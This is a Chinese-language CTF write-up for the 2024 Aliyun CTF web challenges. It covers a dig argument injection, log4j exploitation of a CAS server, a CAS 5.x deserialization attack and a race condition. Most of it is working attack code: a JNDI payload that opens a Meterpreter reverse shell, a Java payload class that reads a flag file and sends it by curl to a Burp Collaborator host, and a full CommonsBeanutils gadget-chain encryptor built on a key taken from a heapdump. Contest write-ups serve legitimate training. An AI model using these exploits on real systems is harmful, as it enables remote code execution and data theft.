2024Aliyun-ctf-web writeup

前言

又是周末比赛，希望以后的CTF组织者都搞到周中 这样在公司上班就能打比赛，本来也是公司要求参与的。这次web题目难度还行，其他的题目没怎么做。所以还是只写web的题目了，记录下。

题目

web签到

一看就是查询dns的，抓包：

很有可能是dig命令，最终将结果base64返回并输出，探测了很长时间domain发现过滤的非常严格。后续在type处注入，也大量的字符转义。翻阅dig参数 有一个-f读取文件，直接读根目录flag。

{"domain":"baidu.com","type":"-f/flag"}

easyCAS

解法1

username处存在log4j，使用burp自带的dnslog探测确实存在。使用JNDIExploit 直接利用tomcatbypass模块反弹shell到metepreter：

先开启ldap

java -jar JNDIExploit-1.4-SNAPSHOT.jar --ip 39.105.56.145 --ldapPort 8881

再发送请求

username=${jndi:ldap://1.1.1.1:8881/TomcatBypass/Meterpreter/1.1.1.1/8884}

标准解法

我猜测这个可能是官方想要的考点，否则log4j打太无脑了。

查阅资料发现默认的用户名是 casuser，密码是 Mellon

http://web3.aliyunctf.com:23723//login?service=http%3A%2F%2Fweb3.aliyunctf.com%3A23723%2Fstatus%2Fheapdump

通过上述链接下载heapdump。直接去访问直接跳转127.0.0.1了。

我们先分析题目，说的是5.x以后就没有问题了吗？我们都知道4.x有反序列化的问题，类似shiro有默认key，直接打反序列化的gadgets。现在5.x的key不是默认了，但是我们有heapdump，IDEA打开查询对应可以：

org.apereo.cas.util.cipher.WebflowConversationStateCipherExecutor

先写一个危险类执行命令，test.class：

package aliyunCTF_Easy_Cas;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.util.Base64;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

public class test extends AbstractTranslet {
    public test() throws IOException {
        super();
        String result = execCommand("cat /flag.txt").trim();
        String command = "curl "+Base64.getEncoder().encodeToString(result.getBytes()).replaceAll("=+$", "") +".244uevo5icza8bg0mu6m4krtekki87.burpcollaborator.net";
        execCommand(command);
        //Runtime.getRuntime().exec("bash -c 'curl `whoami`.jwjb6cgmatrr0s8heby3w1ja61cw0l.burpcollaborator.net'");
    }
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    private static String execCommand(String command) throws IOException {
        StringBuffer output = new StringBuffer();
        Process process = Runtime.getRuntime().exec(command);

        BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
        String line;
        while ((line = reader.readLine()) != null) {
            output.append(line + "\n");
        }
        return output.toString();
    }
}

然后我们结合CB1NOCC反序列化链，构造一个反序列化并利用上面拿到的key加密（直接看网上的分析文章把加密部分扒了过来组合）。

package aliyunCTF_Easy_Cas;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xml.internal.serialize.Serializer;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apereo.cas.util.cipher.WebflowConversationStateCipherExecutor;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;
import java.util.zip.GZIPOutputStream;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import org.apache.commons.beanutils.BeanComparator;

import javax.crypto.spec.SecretKeySpec;

public class attackAeperoCas {

    public static void setFieldValue(Object obj, String filedname, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(filedname);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static void main(String[] args) throws Exception {

        // 构造CB1nocc链接
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.get(test.class.getName());
        byte[] code = clazz.toBytecode();
        TemplatesImpl ti =new TemplatesImpl();
        setFieldValue(ti,"_bytecodes",new byte[][]{code});
        setFieldValue(ti, "_name", "eval");
        final BeanComparator bc = new BeanComparator(null,String.CASE_INSENSITIVE_ORDER);
        final PriorityQueue<Object> pq = new PriorityQueue<Object>(2,bc);
        pq.add("1");
        pq.add("1");
        setFieldValue(bc,"property","outputProperties");
        setFieldValue(pq,"queue",new Object[]{ti,ti});
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(pq);
        oos.close();

        //加密payload
        byte[] skey = "CdsZkifxK9MfH9v0CJ-DJoEvJ3wPMNqUZ8AKoYFLSCwiQ4PGtuh90rN7-QzyaLdALxO3ZtNfgX_de7Pm7kd0Zg".getBytes();
        byte[] ekey = new byte[]{56,62,-30,-91,93,25,105,-71,-92,-30,110,45,-27,44,89,-36};
        SecretKeySpec enkey = new SecretKeySpec(ekey, "AES");
        WebflowConversationStateCipherExecutor webflowConversationStateCipherExecutor = new WebflowConversationStateCipherExecutor(new String(ekey), new String(skey), "AES", 512, 16);

        //这里用setfield 因为setfield我们编写类可以设置父类的属性
        setfield(webflowConversationStateCipherExecutor, "encryptionKey", enkey);

        System.out.println(Base64.getEncoder().encodeToString(webflowConversationStateCipherExecutor.encode(compressString(barr.toByteArray()))));


    }
    public static byte[] compressString(byte[] data) {
        // 使用ByteArrayOutputStream来捕获压缩数据
        try (ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
             GZIPOutputStream gzipOS = new GZIPOutputStream(bos)) {
            // 写入数据到GZIPOutputStream，它会处理压缩
            gzipOS.write(data);
            // 完成压缩数据的写入
            gzipOS.close();
            // 返回压缩后的字节数组
            return bos.toByteArray();
        } catch (IOException e) {
            e.printStackTrace();
            return null;
        }
    }
    //得遍历父类设置对应属性。因为encryptionKey属于webflowConversationStateCipherExecutor父类的属性。
    static public void setfield(Object targetObject, String fieldName, Object newValue) throws NoSuchFieldException {
        try {
            // 获取目标对象的类对象
            Class<?> currentClass = targetObject.getClass();

            // 循环遍历当前类及其父类，直到找到该字段或到达Object类
            Field field = null;
            while (currentClass != null) {
                try {
                    field = currentClass.getDeclaredField(fieldName);
                    break; // 字段找到，退出循环
                } catch (NoSuchFieldException e) {
                    // 当前类中没有该字段，继续在父类中查找
                    currentClass = currentClass.getSuperclass();
                }
            }
            if (field == null) {
                throw new NoSuchFieldException("Field " + fieldName + " not found in class hierarchy");
            }
            // 设置访问权限，允许访问私有字段
            field.setAccessible(true);
            // 设置新的字段值
            field.set(targetObject, newValue);

        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
    }

}

直接DNS携带getshell

这样可能才是这次考点，但是没想到这个环境有log4j直接就RCE了。

重点：CB1NOCC + 加密流程

Pastbin

直接条件竞争,代码直接chagpt就行😂：

import asyncio
import aiohttp

async def fetch_url(session, url):
	while True:
	    async with session.get(url) as response:
	        status = response.status
	        data = await response.text()
	        if "aliyunctf" in data:
	        	print("------------------------------"+data)
	        #print(f"{url} => Status: {status}, Data: {data[:100]}")  # 打印状态码和部分响应内容

async def main():
    urls = ['http://web2.aliyunctf.com:20518/about', 'http://web2.aliyunctf.com:20518/flag']

    # 创建一个aiohttp的ClientSession实例
    async with aiohttp.ClientSession() as session:
    	tasks = []
    	for url in urls:
        	for i in range(200):
        		tasks.append(fetch_url(session,url))
    	await asyncio.gather(*tasks)

# 运行主要的协程
asyncio.run(main())